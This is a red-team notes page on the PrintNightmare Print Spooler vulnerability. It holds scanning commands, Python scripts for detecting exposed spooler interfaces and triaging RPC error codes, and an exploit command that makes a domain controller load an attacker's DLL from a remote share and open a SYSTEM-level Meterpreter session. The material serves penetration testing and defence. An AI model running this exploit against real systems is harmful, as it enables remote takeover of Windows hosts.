Red Teaming and Malware Analysis
PrintNightmare


Last updated 2 years ago

Scanner

python3 /usr/share/doc/python3-impacket/examples/rpcdump.py @10.20.11.x | egrep 'MS-RPRN|MS-PAR'
Protocol: [MS-PAR]: Print System Asynchronous Remote Protocol
Protocol: [MS-RPRN]: Print System Remote Protocol

Seeing MS-RPRN or MS-PAR in this output only tells you that the Print Spooler is running on the target and has registered its interfaces with the endpoint mapper, which is a precondition for the attack; it does not tell you whether the host is patched. Note also that recent GNU grep releases deprecate egrep in favour of grep -E.

Massive scanner: ItWasAllADream (byt3bl33d3r, linked under Sources) runs this kind of check across entire subnets and reports hosts vulnerable to the PrintNightmare RCE (CVE-2021-34527).
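For more than a handful of hosts the same check can be scripted. The following is an added example, not code from this page, from impacket or from ItWasAllADream: it parses rpcdump.py output saved per host and reports which hosts expose MS-RPRN or MS-PAR on a remotely reachable binding, matching on the interface UUID rather than on the [MS-...] tag so that it still works when a given rpcdump build lacks the friendly name. The captures, host addresses and pipe names below are constructed sample data; the UUIDs are the real MS-RPRN, MS-PAR and MS-SCMR interface identifiers.

```python
"""Flag hosts whose rpcdump.py output shows the Print Spooler RPC interfaces.

Added example for this page; not code from impacket, ItWasAllADream or the
page's author. Interface UUIDs are the real ones from the Microsoft specs;
the captures and addresses below are constructed sample data.
"""
import re

# Interface UUIDs (compared lower-cased). Matching on UUID flags a host even
# when the rpcdump build prints "Protocol: N/A" instead of an [MS-...] tag.
SPOOLER_UUIDS = {
    "12345678-1234-abcd-ef00-0123456789ab": "MS-RPRN",  # Print System Remote Protocol
    "76f03f96-cdfd-44fc-a22c-64950a001209": "MS-PAR",   # Print System Asynchronous Remote Protocol
}

# Constructed sample captures: what `rpcdump.py @<host>` prints, one per host.
SAMPLE_CAPTURES = {
    "10.20.11.5": """\
Protocol: [MS-RPRN]: Print System Remote Protocol 
Provider: spoolsv.exe 
UUID    : 12345678-1234-ABCD-EF00-0123456789AB v1.0 
Bindings: 
          ncacn_ip_tcp:10.20.11.5[49667]
          ncalrpc:[LRPC-2f0c9a1d3e4b5c6d7e]
          ncacn_np:\\\\DC01[\\PIPE\\spoolss]

Protocol: [MS-PAR]: Print System Asynchronous Remote Protocol 
Provider: spoolsv.exe 
UUID    : 76F03F96-CDFD-44FC-A22C-64950A001209 v1.0 
Bindings: 
          ncacn_ip_tcp:10.20.11.5[49667]
          ncalrpc:[LRPC-2f0c9a1d3e4b5c6d7e]
""",
    "10.20.11.9": """\
Protocol: [MS-SCMR]: Service Control Manager Remote Protocol 
Provider: services.exe 
UUID    : 367ABB81-9844-35F1-AD32-98F038001003 v2.0 
Bindings: 
          ncacn_ip_tcp:10.20.11.9[49668]
""",
}

PROTO_RE = re.compile(r"^Protocol: (?:\[(?P<tag>[^\]]+)\]|(?P<na>N/A))")
UUID_RE = re.compile(r"^UUID\s*:\s*(?P<uuid>[0-9a-fA-F-]{36})")


def parse_rpcdump(text):
    """Split rpcdump output into interface records: {tag, uuid, bindings}."""
    records, cur = [], None
    for raw in text.splitlines():
        line = raw.rstrip()
        m = PROTO_RE.match(line)
        if m:
            cur = {"tag": m.group("tag") or "N/A", "uuid": None, "bindings": []}
            records.append(cur)
        elif cur is None:
            continue
        elif (m := UUID_RE.match(line)):
            cur["uuid"] = m.group("uuid").lower()
        elif line.startswith(" ") and line.strip():
            # Indented lines under "Bindings:" are the endpoint strings.
            cur["bindings"].append(line.strip())
    return records


def spooler_exposure(text):
    """Map MS-RPRN/MS-PAR -> remotely reachable bindings (ncalrpc is local-only)."""
    exposure = {}
    for rec in parse_rpcdump(text):
        name = SPOOLER_UUIDS.get(rec["uuid"] or "")
        if name:
            exposure[name] = [b for b in rec["bindings"] if not b.startswith("ncalrpc:")]
    return exposure


def scan_hosts(captures):
    """Return {host: exposure} only for hosts exposing either spooler interface."""
    result = {}
    for host, text in captures.items():
        exposure = spooler_exposure(text)
        if exposure:
            result[host] = exposure
    return result


if __name__ == "__main__":
    for host, exposure in scan_hosts(SAMPLE_CAPTURES).items():
        for proto, bindings in exposure.items():
            print(f"{host}: {proto} reachable via {', '.join(bindings) or 'no remote binding'}")
```

In use, replace SAMPLE_CAPTURES with a dict built from files saved as `rpcdump.py @<host> > <host>.txt`; a host listed with only an ncalrpc binding is not reachable over the network and is dropped from the remote bindings.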

Exploit

python3 ./CVE-2021-1675.py purple.lab/pentest:Password123@10.0.0.1 '\\10.0.0.7\smb\pentestlab.dll'

The Python script binds to the Print Spooler over MS-RPRN, calls RpcEnumPrinterDrivers to learn the path of a driver already installed on the target, and then calls RpcAddPrinterDriverEx with the attacker's DLL (the UNC path given on the command line) as the new driver's configuration file, so the spooler fetches and loads it. In the original write-up a Metasploit multi/handler caught the reverse connection, and the resulting Meterpreter session had SYSTEM privileges on the domain controller: the DLL is loaded by the Print Spooler service, which runs as SYSTEM, not in the context of the authenticating domain user. Two practical caveats: the share hosting the DLL must be readable by the domain controller's machine account (or anonymously), since it is the spooler and not the attacker's session that fetches the file; and although the script is named after CVE-2021-1675, the remote code execution variant it exploits was later tracked as CVE-2021-34527.

Maybe fixed | Error

Quoted from the issue thread linked under Sources (#59). It concerns RPC_E_ACCESS_DENIED (0x8001011b), the error a patched spooler returns for RpcAddPrinterDriver, and whether the same code on RpcEnumPrinterDrivers means the same thing (the earlier part of the exchange is reproduced under Sources):

In this case, the error is returned for RpcEnumPrinterDrivers. I don't know in detail if this is also a valid sign of a patched system, but it does seem likely.
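That reasoning can be turned into a small triage routine. The following is an added example, not code from Cube0x0's script, ly4k's scanner or the referenced issue: it applies the rule above (RPC_E_ACCESS_DENIED 0x8001011b on the driver-add call means patched; on RpcEnumPrinterDrivers only probably patched) and additionally recognises three standard Windows RPC status codes the page does not mention: ERROR_ACCESS_DENIED (5), EPT_S_NOT_REGISTERED (1753, spooler not running) and RPC_S_SERVER_UNAVAILABLE (1722). The status tokens, the symbolic-name table and the sample result strings are my own constructions; real tools format their errors differently, so the parser is deliberately loose.

```python
"""Triage an RPC result from a PrintNightmare check or exploitation attempt.

Added example for this page; not from Cube0x0's script, ly4k's scanner or
the referenced GitHub issue. The status tokens and sample result strings are
constructed for illustration.
"""
import re

RPC_E_ACCESS_DENIED = 0x8001011B   # HRESULT a patched spooler returns on driver add
ERROR_ACCESS_DENIED = 5            # rpc_s_access_denied: generic access denied
EPT_S_NOT_REGISTERED = 1753        # ept_s_not_registered: interface not in the endpoint mapper
RPC_S_SERVER_UNAVAILABLE = 1722    # rpc_s_server_unavailable: no RPC server reachable

# Symbolic names some tools print instead of a number (impacket-style names).
NAMED_CODES = {
    "rpc_s_access_denied": ERROR_ACCESS_DENIED,
    "ept_s_not_registered": EPT_S_NOT_REGISTERED,
    "rpc_s_server_unavailable": RPC_S_SERVER_UNAVAILABLE,
}


def extract_code(err):
    """Recover a numeric status from an int, a hex/decimal string or a symbolic name."""
    if err is None:
        return None
    if isinstance(err, int):
        return err
    text = str(err)
    m = re.search(r"0x([0-9a-fA-F]+)", text)
    if m:
        return int(m.group(1), 16)
    for name, code in NAMED_CODES.items():
        if name in text.lower():
            return code
    m = re.search(r"\b(\d+)\b", text)
    return int(m.group(1)) if m else None


def classify(call, err=None):
    """Return (status, explanation) for the outcome of one RPC call.

    call: 'RpcEnumPrinterDrivers' or 'RpcAddPrinterDriverEx' (the two calls the
    exploit script makes); err: None on success, else the error as int or str.
    """
    adding = call.startswith("RpcAddPrinterDriver")
    if err is None:
        if adding:
            return "exploited", "driver accepted: spooler loaded the UNC DLL as SYSTEM (unpatched)"
        return "enum_ok", "enumeration succeeded: spooler reachable, proceed to RpcAddPrinterDriverEx"
    code = extract_code(err)
    if code == RPC_E_ACCESS_DENIED:
        if adding:
            return "patched", "RPC_E_ACCESS_DENIED (0x8001011b) on driver add: host has the fix"
        return "probably_patched", "RPC_E_ACCESS_DENIED on enumeration: likely patched, unconfirmed"
    if code == ERROR_ACCESS_DENIED:
        return "access_denied", "generic ERROR_ACCESS_DENIED: credentials, pipe ACL or admin-only driver install; inconclusive"
    if code == EPT_S_NOT_REGISTERED:
        return "spooler_stopped", "interface not registered: Print Spooler service is not running"
    if code == RPC_S_SERVER_UNAVAILABLE:
        return "unreachable", "RPC server unavailable: host or its RPC endpoint not reachable"
    shown = f"0x{code:08x}" if code is not None else repr(err)
    return "unknown", f"unrecognised error {shown}: inspect manually"


# Constructed sample results, shape (host, call, error-or-None).
SAMPLE_RESULTS = [
    ("dc01",  "RpcEnumPrinterDrivers", None),
    ("dc01",  "RpcAddPrinterDriverEx", "DCERPC Runtime Error: code: 0x8001011b"),
    ("srv02", "RpcEnumPrinterDrivers", "DCERPC Runtime Error: code: 0x8001011b"),
    ("ws03",  "RpcEnumPrinterDrivers", "ept_s_not_registered"),
    ("ws04",  "RpcAddPrinterDriverEx", None),
]


def triage(results):
    """Summarise (host, call, err) tuples as {host: status}; a driver-add result wins."""
    summary = {}
    for host, call, err in results:
        status, _ = classify(call, err)
        if host not in summary or call.startswith("RpcAddPrinterDriver"):
            summary[host] = status
    return summary


if __name__ == "__main__":
    for host, call, err in SAMPLE_RESULTS:
        status, why = classify(call, err)
        print(f"{host:6} {call:22} {status:16} {why}")
```

The only status this code treats as definitive proof of a fix is RPC_E_ACCESS_DENIED on the driver-add call, matching the quoted reasoning; everything else is surfaced with an explanation rather than collapsed into "patched" or "vulnerable".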

Sources

Notes on the linked tools:

A spooler check has also been incorporated into PingCastle, a tool that benchmarks the security posture of an Active Directory. The "spooler" entry in its scanner menu can scan all hosts in the domain, only servers, only workstations, or only the domain controllers.

The Impacket implementation of PrintNightmare was developed by Cube0x0 and can be found in the linked GitHub repository. At the time of writing, the upstream version of Impacket produced errors when exploiting PrintNightmare through the Python script, so use the Impacket version included in that repository. The script requires domain user credentials, the IP address of the domain controller and the UNC path on which the DLL is hosted.

From the GitHub issue (#59, linked below) on whether an RPC error means the host is patched:

0x8001011b is the error code for RPC_E_ACCESS_DENIED. I know that this is an indication of a fixed system when returned for RpcAddPrinterDriver (see, e.g., the functionality of [link not preserved]).

[link not preserved] seems to reference the same issue, so I am cross-referencing it here in case others are looking for an answer.

Links:

  • PingCastle: https://github.com/vletoux/pingcastle (Get Active Directory Security at 80% in 20% of the time)
  • Cube0x0: CVE-2021-1675, the Impacket implementation of PrintNightmare (original link not preserved)
  • https://github.com/ly4k/PrintNightmare
  • Issue #59 (original link not preserved)
  • https://0xdf.gitlab.io/2021/07/08/playing-with-printnightmare.html
  • GitHub: byt3bl33d3r/ItWasAllADream, a PrintNightmare (CVE-2021-34527) Python scanner that scans entire subnets for hosts vulnerable to the PrintNightmare RCE
  • PrintNightmare, Penetration Testing Lab (original link not preserved)